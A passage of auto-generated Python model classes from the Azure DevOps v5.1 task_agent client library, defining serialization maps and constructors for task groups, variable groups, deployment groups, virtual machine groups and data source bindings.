'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'minimum_agent_version': {'key': 'minimumAgentVersion', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'output_variables': {'key': 'outputVariables', 'type': '[TaskOutputVariable]'},
'package_location': {'key': 'packageLocation', 'type': 'str'},
'package_type': {'key': 'packageType', 'type': 'str'},
'post_job_execution': {'key': 'postJobExecution', 'type': '{object}'},
'pre_job_execution': {'key': 'preJobExecution', 'type': '{object}'},
'preview': {'key': 'preview', 'type': 'bool'},
'release_notes': {'key': 'releaseNotes', 'type': 'str'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'satisfies': {'key': 'satisfies', 'type': '[str]'},
'server_owned': {'key': 'serverOwned', 'type': 'bool'},
'show_environment_variables': {'key': 'showEnvironmentVariables', 'type': 'bool'},
'source_definitions': {'key': 'sourceDefinitions', 'type': '[TaskSourceDefinition]'},
'source_location': {'key': 'sourceLocation', 'type': 'str'},
'version': {'key': 'version', 'type': 'TaskVersion'},
'visibility': {'key': 'visibility', 'type': '[str]'},
'comment': {'key': 'comment', 'type': 'str'},
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'deleted': {'key': 'deleted', 'type': 'bool'},
'modified_by': {'key': 'modifiedBy', 'type': 'IdentityRef'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'owner': {'key': 'owner', 'type': 'str'},
'parent_definition_id': {'key': 'parentDefinitionId', 'type': 'str'},
'revision': {'key': 'revision', 'type': 'int'},
'tasks': {'key': 'tasks', 'type': '[TaskGroupStep]'}
}
def __init__(self, agent_execution=None, author=None, category=None, contents_uploaded=None, contribution_identifier=None, contribution_version=None, data_source_bindings=None, definition_type=None, demands=None, deprecated=None, description=None, disabled=None, ecosystem=None, execution=None, friendly_name=None, groups=None, help_mark_down=None, help_url=None, host_type=None, icon_url=None, id=None, inputs=None, instance_name_format=None, minimum_agent_version=None, name=None, output_variables=None, package_location=None, package_type=None, post_job_execution=None, pre_job_execution=None, preview=None, release_notes=None, runs_on=None, satisfies=None, server_owned=None, show_environment_variables=None, source_definitions=None, source_location=None, version=None, visibility=None, comment=None, created_by=None, created_on=None, deleted=None, modified_by=None, modified_on=None, owner=None, parent_definition_id=None, revision=None, tasks=None):
super(TaskGroup, self).__init__(agent_execution=agent_execution, author=author, category=category, contents_uploaded=contents_uploaded, contribution_identifier=contribution_identifier, contribution_version=contribution_version, data_source_bindings=data_source_bindings, definition_type=definition_type, demands=demands, deprecated=deprecated, description=description, disabled=disabled, ecosystem=ecosystem, execution=execution, friendly_name=friendly_name, groups=groups, help_mark_down=help_mark_down, help_url=help_url, host_type=host_type, icon_url=icon_url, id=id, inputs=inputs, instance_name_format=instance_name_format, minimum_agent_version=minimum_agent_version, name=name, output_variables=output_variables, package_location=package_location, package_type=package_type, post_job_execution=post_job_execution, pre_job_execution=pre_job_execution, preview=preview, release_notes=release_notes, runs_on=runs_on, satisfies=satisfies, server_owned=server_owned, show_environment_variables=show_environment_variables, source_definitions=source_definitions, source_location=source_location, version=version, visibility=visibility)
self.comment = comment
self.created_by = created_by
self.created_on = created_on
self.deleted = deleted
self.modified_by = modified_by
self.modified_on = modified_on
self.owner = owner
self.parent_definition_id = parent_definition_id
self.revision = revision
self.tasks = tasks
class TaskGroupCreateParameter(Model):
"""
:param author: Sets author name of the task group.
:type author: str
:param category: Sets category of the task group.
:type category: str
:param description: Sets description of the task group.
:type description: str
:param friendly_name: Sets friendly name of the task group.
:type friendly_name: str
:param icon_url: Sets url icon of the task group.
:type icon_url: str
:param inputs: Sets input for the task group.
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format: Sets display name of the task group.
:type instance_name_format: str
:param name: Sets name of the task group.
:type name: str
:param parent_definition_id: Sets parent task group Id. This is used while creating a draft task group.
:type parent_definition_id: str
:param runs_on: Sets RunsOn of the task group. Value can be 'Agent', 'Server' or 'DeploymentGroup'.
:type runs_on: list of str
:param tasks: Sets tasks for the task group.
:type tasks: list of :class:`TaskGroupStep <azure.devops.v5_1.task_agent.models.TaskGroupStep>`
:param version: Sets version of the task group.
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
"""
_attribute_map = {
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'parent_definition_id': {'key': 'parentDefinitionId', 'type': 'str'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'tasks': {'key': 'tasks', 'type': '[TaskGroupStep]'},
'version': {'key': 'version', 'type': 'TaskVersion'}
}
def __init__(self, author=None, category=None, description=None, friendly_name=None, icon_url=None, inputs=None, instance_name_format=None, name=None, parent_definition_id=None, runs_on=None, tasks=None, version=None):
super(TaskGroupCreateParameter, self).__init__()
self.author = author
self.category = category
self.description = description
self.friendly_name = friendly_name
self.icon_url = icon_url
self.inputs = inputs
self.instance_name_format = instance_name_format
self.name = name
self.parent_definition_id = parent_definition_id
self.runs_on = runs_on
self.tasks = tasks
self.version = version
class TaskGroupDefinition(Model):
"""
:param display_name:
:type display_name: str
:param is_expanded:
:type is_expanded: bool
:param name:
:type name: str
:param tags:
:type tags: list of str
:param visible_rule:
:type visible_rule: str
"""
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'is_expanded': {'key': 'isExpanded', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
'tags': {'key': 'tags', 'type': '[str]'},
'visible_rule': {'key': 'visibleRule', 'type': 'str'}
}
def __init__(self, display_name=None, is_expanded=None, name=None, tags=None, visible_rule=None):
super(TaskGroupDefinition, self).__init__()
self.display_name = display_name
self.is_expanded = is_expanded
self.name = name
self.tags = tags
self.visible_rule = visible_rule
class TaskGroupRevision(Model):
"""
:param changed_by:
:type changed_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param changed_date:
:type changed_date: datetime
:param change_type:
:type change_type: object
:param comment:
:type comment: str
:param file_id:
:type file_id: int
:param major_version:
:type major_version: int
:param revision:
:type revision: int
:param task_group_id:
:type task_group_id: str
"""
_attribute_map = {
'changed_by': {'key': 'changedBy', 'type': 'IdentityRef'},
'changed_date': {'key': 'changedDate', 'type': 'iso-8601'},
'change_type': {'key': 'changeType', 'type': 'object'},
'comment': {'key': 'comment', 'type': 'str'},
'file_id': {'key': 'fileId', 'type': 'int'},
'major_version': {'key': 'majorVersion', 'type': 'int'},
'revision': {'key': 'revision', 'type': 'int'},
'task_group_id': {'key': 'taskGroupId', 'type': 'str'}
}
def __init__(self, changed_by=None, changed_date=None, change_type=None, comment=None, file_id=None, major_version=None, revision=None, task_group_id=None):
super(TaskGroupRevision, self).__init__()
self.changed_by = changed_by
self.changed_date = changed_date
self.change_type = change_type
self.comment = comment
self.file_id = file_id
self.major_version = major_version
self.revision = revision
self.task_group_id = task_group_id
class TaskGroupStep(Model):
"""
Represents tasks in the task group.
:param always_run: Gets or sets as 'true' to run the task always, 'false' otherwise.
:type always_run: bool
:param condition: Gets or sets condition for the task.
:type condition: str
:param continue_on_error: Gets or sets as 'true' to continue on error, 'false' otherwise.
:type continue_on_error: bool
:param display_name: Gets or sets the display name.
:type display_name: str
:param enabled: Gets or sets as task is enabled or not.
:type enabled: bool
:param environment: Gets dictionary of environment variables.
:type environment: dict
:param inputs: Gets or sets dictionary of inputs.
:type inputs: dict
:param task: Gets or sets the reference of the task.
:type task: :class:`TaskDefinitionReference <azure.devops.v5_1.task_agent.models.TaskDefinitionReference>`
:param timeout_in_minutes: Gets or sets the maximum time, in minutes, that a task is allowed to execute on agent before being cancelled by server. A zero value indicates an infinite timeout.
:type timeout_in_minutes: int
"""
_attribute_map = {
'always_run': {'key': 'alwaysRun', 'type': 'bool'},
'condition': {'key': 'condition', 'type': 'str'},
'continue_on_error': {'key': 'continueOnError', 'type': 'bool'},
'display_name': {'key': 'displayName', 'type': 'str'},
'enabled': {'key': 'enabled', 'type': 'bool'},
'environment': {'key': 'environment', 'type': '{str}'},
'inputs': {'key': 'inputs', 'type': '{str}'},
'task': {'key': 'task', 'type': 'TaskDefinitionReference'},
'timeout_in_minutes': {'key': 'timeoutInMinutes', 'type': 'int'}
}
def __init__(self, always_run=None, condition=None, continue_on_error=None, display_name=None, enabled=None, environment=None, inputs=None, task=None, timeout_in_minutes=None):
super(TaskGroupStep, self).__init__()
self.always_run = always_run
self.condition = condition
self.continue_on_error = continue_on_error
self.display_name = display_name
self.enabled = enabled
self.environment = environment
self.inputs = inputs
self.task = task
self.timeout_in_minutes = timeout_in_minutes
class TaskGroupUpdateParameter(Model):
"""
:param author: Sets author name of the task group.
:type author: str
:param category: Sets category of the task group.
:type category: str
:param comment: Sets comment of the task group.
:type comment: str
:param description: Sets description of the task group.
:type description: str
:param friendly_name: Sets friendly name of the task group.
:type friendly_name: str
    :param icon_url: Sets the icon URL of the task group.
:type icon_url: str
:param id: Sets the unique identifier of this field.
:type id: str
:param inputs: Sets input for the task group.
:type inputs: list of :class:`TaskInputDefinition <azure.devops.v5_1.task_agent.models.TaskInputDefinition>`
:param instance_name_format: Sets display name of the task group.
:type instance_name_format: str
:param name: Sets name of the task group.
:type name: str
:param parent_definition_id: Gets or sets parent task group Id. This is used while creating a draft task group.
:type parent_definition_id: str
:param revision: Sets revision of the task group.
:type revision: int
:param runs_on: Sets RunsOn of the task group. Value can be 'Agent', 'Server' or 'DeploymentGroup'.
:type runs_on: list of str
:param tasks: Sets tasks for the task group.
:type tasks: list of :class:`TaskGroupStep <azure.devops.v5_1.task_agent.models.TaskGroupStep>`
:param version: Sets version of the task group.
:type version: :class:`TaskVersion <azure.devops.v5_1.task_agent.models.TaskVersion>`
"""
_attribute_map = {
'author': {'key': 'author', 'type': 'str'},
'category': {'key': 'category', 'type': 'str'},
'comment': {'key': 'comment', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'icon_url': {'key': 'iconUrl', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[TaskInputDefinition]'},
'instance_name_format': {'key': 'instanceNameFormat', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'parent_definition_id': {'key': 'parentDefinitionId', 'type': 'str'},
'revision': {'key': 'revision', 'type': 'int'},
'runs_on': {'key': 'runsOn', 'type': '[str]'},
'tasks': {'key': 'tasks', 'type': '[TaskGroupStep]'},
'version': {'key': 'version', 'type': 'TaskVersion'}
}
def __init__(self, author=None, category=None, comment=None, description=None, friendly_name=None, icon_url=None, id=None, inputs=None, instance_name_format=None, name=None, parent_definition_id=None, revision=None, runs_on=None, tasks=None, version=None):
super(TaskGroupUpdateParameter, self).__init__()
self.author = author
self.category = category
self.comment = comment
self.description = description
self.friendly_name = friendly_name
self.icon_url = icon_url
self.id = id
self.inputs = inputs
self.instance_name_format = instance_name_format
self.name = name
self.parent_definition_id = parent_definition_id
self.revision = revision
self.runs_on = runs_on
self.tasks = tasks
self.version = version
class TaskHubLicenseDetails(Model):
"""
:param enterprise_users_count:
:type enterprise_users_count: int
:param failed_to_reach_all_providers:
:type failed_to_reach_all_providers: bool
:param free_hosted_license_count:
:type free_hosted_license_count: int
:param free_license_count:
:type free_license_count: int
:param has_license_count_ever_updated:
:type has_license_count_ever_updated: bool
:param hosted_agent_minutes_free_count:
:type hosted_agent_minutes_free_count: int
:param hosted_agent_minutes_used_count:
:type hosted_agent_minutes_used_count: int
:param hosted_licenses_are_premium:
:type hosted_licenses_are_premium: bool
:param marketplace_purchased_hosted_licenses:
:type marketplace_purchased_hosted_licenses: list of :class:`MarketplacePurchasedLicense <azure.devops.v5_1.task_agent.models.MarketplacePurchasedLicense>`
:param msdn_users_count:
:type msdn_users_count: int
:param purchased_hosted_license_count: Microsoft-hosted licenses purchased from VSTS directly.
:type purchased_hosted_license_count: int
:param purchased_license_count: Self-hosted licenses purchased from VSTS directly.
:type purchased_license_count: int
:param total_hosted_license_count:
:type total_hosted_license_count: int
:param total_license_count:
:type total_license_count: int
:param total_private_license_count:
:type total_private_license_count: int
"""
_attribute_map = {
'enterprise_users_count': {'key': 'enterpriseUsersCount', 'type': 'int'},
'failed_to_reach_all_providers': {'key': 'failedToReachAllProviders', 'type': 'bool'},
'free_hosted_license_count': {'key': 'freeHostedLicenseCount', 'type': 'int'},
'free_license_count': {'key': 'freeLicenseCount', 'type': 'int'},
'has_license_count_ever_updated': {'key': 'hasLicenseCountEverUpdated', 'type': 'bool'},
'hosted_agent_minutes_free_count': {'key': 'hostedAgentMinutesFreeCount', 'type': 'int'},
'hosted_agent_minutes_used_count': {'key': 'hostedAgentMinutesUsedCount', 'type': 'int'},
'hosted_licenses_are_premium': {'key': 'hostedLicensesArePremium', 'type': 'bool'},
'marketplace_purchased_hosted_licenses': {'key': 'marketplacePurchasedHostedLicenses', 'type': '[MarketplacePurchasedLicense]'},
'msdn_users_count': {'key': 'msdnUsersCount', 'type': 'int'},
'purchased_hosted_license_count': {'key': 'purchasedHostedLicenseCount', 'type': 'int'},
'purchased_license_count': {'key': 'purchasedLicenseCount', 'type': 'int'},
'total_hosted_license_count': {'key': 'totalHostedLicenseCount', 'type': 'int'},
'total_license_count': {'key': 'totalLicenseCount', 'type': 'int'},
'total_private_license_count': {'key': 'totalPrivateLicenseCount', 'type': 'int'}
}
def __init__(self, enterprise_users_count=None, failed_to_reach_all_providers=None, free_hosted_license_count=None, free_license_count=None, has_license_count_ever_updated=None, hosted_agent_minutes_free_count=None, hosted_agent_minutes_used_count=None, hosted_licenses_are_premium=None, marketplace_purchased_hosted_licenses=None, msdn_users_count=None, purchased_hosted_license_count=None, purchased_license_count=None, total_hosted_license_count=None, total_license_count=None, total_private_license_count=None):
super(TaskHubLicenseDetails, self).__init__()
self.enterprise_users_count = enterprise_users_count
self.failed_to_reach_all_providers = failed_to_reach_all_providers
self.free_hosted_license_count = free_hosted_license_count
self.free_license_count = free_license_count
self.has_license_count_ever_updated = has_license_count_ever_updated
self.hosted_agent_minutes_free_count = hosted_agent_minutes_free_count
self.hosted_agent_minutes_used_count = hosted_agent_minutes_used_count
self.hosted_licenses_are_premium = hosted_licenses_are_premium
self.marketplace_purchased_hosted_licenses = marketplace_purchased_hosted_licenses
self.msdn_users_count = msdn_users_count
self.purchased_hosted_license_count = purchased_hosted_license_count
self.purchased_license_count = purchased_license_count
self.total_hosted_license_count = total_hosted_license_count
self.total_license_count = total_license_count
self.total_private_license_count = total_private_license_count
class TaskInputDefinitionBase(Model):
"""
:param aliases:
:type aliases: list of str
:param default_value:
:type default_value: str
:param group_name:
:type group_name: str
:param help_mark_down:
:type help_mark_down: str
:param label:
:type label: str
:param name:
:type name: str
:param options:
:type options: dict
:param properties:
:type properties: dict
:param required:
:type required: bool
:param type:
:type type: str
:param validation:
:type validation: :class:`TaskInputValidation <azure.devops.v5_1.microsoft._team_foundation._distributed_task._common._contracts.models.TaskInputValidation>`
:param visible_rule:
:type visible_rule: str
"""
_attribute_map = {
'aliases': {'key': 'aliases', 'type': '[str]'},
'default_value': {'key': 'defaultValue', 'type': 'str'},
'group_name': {'key': 'groupName', 'type': 'str'},
'help_mark_down': {'key': 'helpMarkDown', 'type': 'str'},
'label': {'key': 'label', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'options': {'key': 'options', 'type': '{str}'},
'properties': {'key': 'properties', 'type': '{str}'},
'required': {'key': 'required', 'type': 'bool'},
'type': {'key': 'type', 'type': 'str'},
'validation': {'key': 'validation', 'type': 'TaskInputValidation'},
'visible_rule': {'key': 'visibleRule', 'type': 'str'}
}
def __init__(self, aliases=None, default_value=None, group_name=None, help_mark_down=None, label=None, name=None, options=None, properties=None, required=None, type=None, validation=None, visible_rule=None):
super(TaskInputDefinitionBase, self).__init__()
self.aliases = aliases
self.default_value = default_value
self.group_name = group_name
self.help_mark_down = help_mark_down
self.label = label
self.name = name
self.options = options
self.properties = properties
self.required = required
self.type = type
self.validation = validation
self.visible_rule = visible_rule
class TaskInputValidation(Model):
"""
:param expression: Conditional expression
:type expression: str
:param message: Message explaining how user can correct if validation fails
:type message: str
"""
_attribute_map = {
'expression': {'key': 'expression', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'}
}
def __init__(self, expression=None, message=None):
super(TaskInputValidation, self).__init__()
self.expression = expression
self.message = message
class TaskOrchestrationOwner(Model):
"""
:param _links:
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.task_agent.models.ReferenceLinks>`
:param id:
:type id: int
:param name:
:type name: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, _links=None, id=None, name=None):
super(TaskOrchestrationOwner, self).__init__()
self._links = _links
self.id = id
self.name = name
class TaskOutputVariable(Model):
"""
:param description:
:type description: str
:param name:
:type name: str
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, description=None, name=None):
super(TaskOutputVariable, self).__init__()
self.description = description
self.name = name
class TaskPackageMetadata(Model):
"""
:param type: Gets the name of the package.
:type type: str
:param url: Gets the url of the package.
:type url: str
:param version: Gets the version of the package.
:type version: str
"""
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'}
}
def __init__(self, type=None, url=None, version=None):
super(TaskPackageMetadata, self).__init__()
self.type = type
self.url = url
self.version = version
class TaskReference(Model):
"""
:param id:
:type id: str
:param inputs:
:type inputs: dict
:param name:
:type name: str
:param version:
:type version: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '{str}'},
'name': {'key': 'name', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'}
}
def __init__(self, id=None, inputs=None, name=None, version=None):
super(TaskReference, self).__init__()
self.id = id
self.inputs = inputs
self.name = name
self.version = version
class TaskSourceDefinitionBase(Model):
"""
:param auth_key:
:type auth_key: str
:param endpoint:
:type endpoint: str
:param key_selector:
:type key_selector: str
:param selector:
:type selector: str
:param target:
:type target: str
"""
_attribute_map = {
'auth_key': {'key': 'authKey', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'str'},
'key_selector': {'key': 'keySelector', 'type': 'str'},
'selector': {'key': 'selector', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'}
}
def __init__(self, auth_key=None, endpoint=None, key_selector=None, selector=None, target=None):
super(TaskSourceDefinitionBase, self).__init__()
self.auth_key = auth_key
self.endpoint = endpoint
self.key_selector = key_selector
self.selector = selector
self.target = target
class TaskVersion(Model):
"""
:param is_test:
:type is_test: bool
:param major:
:type major: int
:param minor:
:type minor: int
:param patch:
:type patch: int
"""
_attribute_map = {
'is_test': {'key': 'isTest', 'type': 'bool'},
'major': {'key': 'major', 'type': 'int'},
'minor': {'key': 'minor', 'type': 'int'},
'patch': {'key': 'patch', 'type': 'int'}
}
def __init__(self, is_test=None, major=None, minor=None, patch=None):
super(TaskVersion, self).__init__()
self.is_test = is_test
self.major = major
self.minor = minor
self.patch = patch
class ValidationItem(Model):
"""
:param is_valid: Tells whether the current input is valid or not
:type is_valid: bool
:param reason: Reason for input validation failure
:type reason: str
:param type: Type of validation item
:type type: str
    :param value: Value to validate. For the "expression" type, this is the conditional expression to evaluate, e.g. eq(variables['Build.SourceBranch'], 'refs/heads/master') or eq(value, 'refs/heads/master')
:type value: str
"""
_attribute_map = {
'is_valid': {'key': 'isValid', 'type': 'bool'},
'reason': {'key': 'reason', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, is_valid=None, reason=None, type=None, value=None):
super(ValidationItem, self).__init__()
self.is_valid = is_valid
self.reason = reason
self.type = type
self.value = value
class VariableGroup(Model):
"""
A variable group is a collection of related variables.
:param created_by: Gets or sets the identity who created the variable group.
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
    :param created_on: Gets or sets the time when the variable group was created.
:type created_on: datetime
:param description: Gets or sets description of the variable group.
:type description: str
:param id: Gets or sets id of the variable group.
:type id: int
:param is_shared: Indicates whether variable group is shared with other projects or not.
:type is_shared: bool
:param modified_by: Gets or sets the identity who modified the variable group.
:type modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
    :param modified_on: Gets or sets the time when the variable group was modified.
:type modified_on: datetime
:param name: Gets or sets name of the variable group.
:type name: str
:param provider_data: Gets or sets provider data.
:type provider_data: :class:`VariableGroupProviderData <azure.devops.v5_1.task_agent.models.VariableGroupProviderData>`
:param type: Gets or sets type of the variable group.
:type type: str
:param variables: Gets or sets variables contained in the variable group.
:type variables: dict
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'is_shared': {'key': 'isShared', 'type': 'bool'},
'modified_by': {'key': 'modifiedBy', 'type': 'IdentityRef'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'provider_data': {'key': 'providerData', 'type': 'VariableGroupProviderData'},
'type': {'key': 'type', 'type': 'str'},
'variables': {'key': 'variables', 'type': '{VariableValue}'}
}
def __init__(self, created_by=None, created_on=None, description=None, id=None, is_shared=None, modified_by=None, modified_on=None, name=None, provider_data=None, type=None, variables=None):
super(VariableGroup, self).__init__()
self.created_by = created_by
self.created_on = created_on
self.description = description
self.id = id
self.is_shared = is_shared
self.modified_by = modified_by
self.modified_on = modified_on
self.name = name
self.provider_data = provider_data
self.type = type
self.variables = variables
class VariableGroupParameters(Model):
"""
:param description: Sets description of the variable group.
:type description: str
:param name: Sets name of the variable group.
:type name: str
:param provider_data: Sets provider data.
:type provider_data: :class:`VariableGroupProviderData <azure.devops.v5_1.task_agent.models.VariableGroupProviderData>`
:param type: Sets type of the variable group.
:type type: str
:param variables: Sets variables contained in the variable group.
:type variables: dict
"""
_attribute_map = {
'description': {'key': 'description', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'provider_data': {'key': 'providerData', 'type': 'VariableGroupProviderData'},
'type': {'key': 'type', 'type': 'str'},
'variables': {'key': 'variables', 'type': '{VariableValue}'}
}
def __init__(self, description=None, name=None, provider_data=None, type=None, variables=None):
super(VariableGroupParameters, self).__init__()
self.description = description
self.name = name
self.provider_data = provider_data
self.type = type
self.variables = variables
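# Example (sketch): building parameters for a new variable group. The 'Vsts'
# type value is an assumption about typical usage, and VariableValue is
# defined later in this module.
#
#   VariableGroupParameters(
#       name='release-secrets',
#       type='Vsts',
#       variables={'apiKey': VariableValue(is_secret=True, value='...')},
#   )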
class VariableGroupProviderData(Model):
"""
Defines provider data of the variable group.
"""
_attribute_map = {
}
def __init__(self):
super(VariableGroupProviderData, self).__init__()
class VariableValue(Model):
"""
:param is_secret:
:type is_secret: bool
:param value:
:type value: str
"""
_attribute_map = {
'is_secret': {'key': 'isSecret', 'type': 'bool'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, is_secret=None, value=None):
super(VariableValue, self).__init__()
self.is_secret = is_secret
self.value = value
class VirtualMachine(Model):
"""
:param agent:
:type agent: :class:`TaskAgent <azure.devops.v5_1.task_agent.models.TaskAgent>`
:param id:
:type id: int
:param tags:
:type tags: list of str
"""
_attribute_map = {
'agent': {'key': 'agent', 'type': 'TaskAgent'},
'id': {'key': 'id', 'type': 'int'},
'tags': {'key': 'tags', 'type': '[str]'}
}
def __init__(self, agent=None, id=None, tags=None):
super(VirtualMachine, self).__init__()
self.agent = agent
self.id = id
self.tags = tags
class VirtualMachineGroup(EnvironmentResource):
"""
:param created_by:
:type created_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param created_on:
:type created_on: datetime
:param environment_reference:
:type environment_reference: :class:`EnvironmentReference <azure.devops.v5_1.task_agent.models.EnvironmentReference>`
:param id:
:type id: int
:param last_modified_by:
:type last_modified_by: :class:`IdentityRef <azure.devops.v5_1.task_agent.models.IdentityRef>`
:param last_modified_on:
:type last_modified_on: datetime
:param name:
:type name: str
:param type: Environment resource type
:type type: object
:param pool_id:
:type pool_id: int
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'IdentityRef'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'environment_reference': {'key': 'environmentReference', 'type': 'EnvironmentReference'},
'id': {'key': 'id', 'type': 'int'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'IdentityRef'},
'last_modified_on': {'key': 'lastModifiedOn', 'type': 'iso-8601'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'object'},
'pool_id': {'key': 'poolId', 'type': 'int'}
}
def __init__(self, created_by=None, created_on=None, environment_reference=None, id=None, last_modified_by=None, last_modified_on=None, name=None, type=None, pool_id=None):
super(VirtualMachineGroup, self).__init__(created_by=created_by, created_on=created_on, environment_reference=environment_reference, id=id, last_modified_by=last_modified_by, last_modified_on=last_modified_on, name=name, type=type)
self.pool_id = pool_id
class VirtualMachineGroupCreateParameters(Model):
"""
:param name:
:type name: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'}
}
def __init__(self, name=None):
super(VirtualMachineGroupCreateParameters, self).__init__()
self.name = name
class DataSourceBinding(DataSourceBindingBase):
"""
    :param callback_context_template: Pagination format supported by this data source (ContinuationToken/SkipTop).
:type callback_context_template: str
    :param callback_required_template: Template that determines whether subsequent calls are needed.
:type callback_required_template: str
:param data_source_name: Gets or sets the name of the data source.
:type data_source_name: str
:param endpoint_id: Gets or sets the endpoint Id.
:type endpoint_id: str
:param endpoint_url: Gets or sets the url of the service endpoint.
:type endpoint_url: str
:param headers: Gets or sets the authorization headers.
:type headers: list of :class:`AuthorizationHeader <azure.devops.v5_1.task_agent.models.AuthorizationHeader>`
:param initial_context_template: Defines the initial value of the query params
:type initial_context_template: str
:param parameters: Gets or sets the parameters for the data source.
:type parameters: dict
:param request_content: Gets or sets http request body
:type request_content: str
:param request_verb: Gets or sets http request verb
:type request_verb: str
:param result_selector: Gets or sets the result selector.
:type result_selector: str
:param result_template: Gets or sets the result template.
:type result_template: str
:param target: Gets or sets the target of the data source.
:type target: str
"""
_attribute_map = {
'callback_context_template': {'key': 'callbackContextTemplate', 'type': 'str'},
'callback_required_template': {'key': 'callbackRequiredTemplate', 'type': 'str'},
'data_source_name': {'key': 'dataSourceName', 'type': 'str'},
'endpoint_id': {'key': 'endpointId', 'type': 'str'},
'endpoint_url': {'key': 'endpointUrl', 'type': 'str'},
'headers': {'key': 'headers', 'type': '[AuthorizationHeader]'},
'initial_context_template': {'key': 'initialContextTemplate', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{str}'},
'request_content': {'key': 'requestContent', 'type': 'str'},
'request_verb': {'key': 'requestVerb', 'type': 'str'},
'result_selector': {'key': 'resultSelector', 'type': 'str'},
'result_template': {'key': 'resultTemplate', 'type': 'str'},
'target': {'key': 'target', 'type': 'str'},
}
def __init__(self, callback_context_template=None, callback_required_template=None, data_source_name=None, endpoint_id=None, endpoint_url=None, headers=None, initial_context_template=None, parameters=None, request_content=None, request_verb=None, result_selector=None, result_template=None, target=None):
super(DataSourceBinding, self).__init__(callback_context_template=callback_context_template, callback_required_template=callback_required_template, data_source_name=data_source_name, endpoint_id=endpoint_id, endpoint_url=endpoint_url, headers=headers, initial_context_template=initial_context_template, parameters=parameters, request_content=request_content, request_verb=request_verb, result_selector=result_selector, result_template=result_template, target=target)
class DeploymentGroup(DeploymentGroupReference):
"""
Deployment group.
:param id: Deployment group identifier.
:type id: int
:param name: Name of the deployment group.
:type name: str
:param pool: Deployment pool in which deployment agents are registered.
:type pool: :class:`TaskAgentPoolReference <azure.devops.v5_1.task_agent.models.TaskAgentPoolReference>`
:param project: Project to which the deployment group belongs.
:type project: :class:`ProjectReference <azure.devops.v5_1.task_agent.models.ProjectReference>`
:param description: Description of the deployment group.
:type description: str
:param machine_count: Number of deployment targets in the deployment group.
:type machine_count: int
:param machines: List of deployment targets in the deployment group.
:type machines: list of :class:`DeploymentMachine <azure.devops.v5_1.task_agent.models.DeploymentMachine>`
:param machine_tags: List of unique tags across all deployment targets in the deployment group.
:type machine_tags: list of str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'int'},
'name': {'key': 'name', 'type': 'str'},
'pool': {'key': 'pool', 'type': 'TaskAgentPoolReference'},
'project': {'key': 'project', 'type': 'ProjectReference'},
'description': {'key': 'description', 'type': 'str'},
'machine_count': {'key': 'machineCount', 'type': 'int'},
'machines': {'key': 'machines', 'type': '[DeploymentMachine]'},
'machine_tags': {'key': 'machineTags', 'type': '[str]'}
}
def __init__(self, id=None, name=None, pool=None, project=None, description=None, machine_count=None, machines=None, machine_tags=None):
super(DeploymentGroup, self).__init__(id=id, name=name, pool=pool, project=project)
self.description = description
self.machine_count = machine_count
self.machines = machines
self.machine_tags = machine_tags
class DeploymentMachineGroup(DeploymentMachineGroupReference):
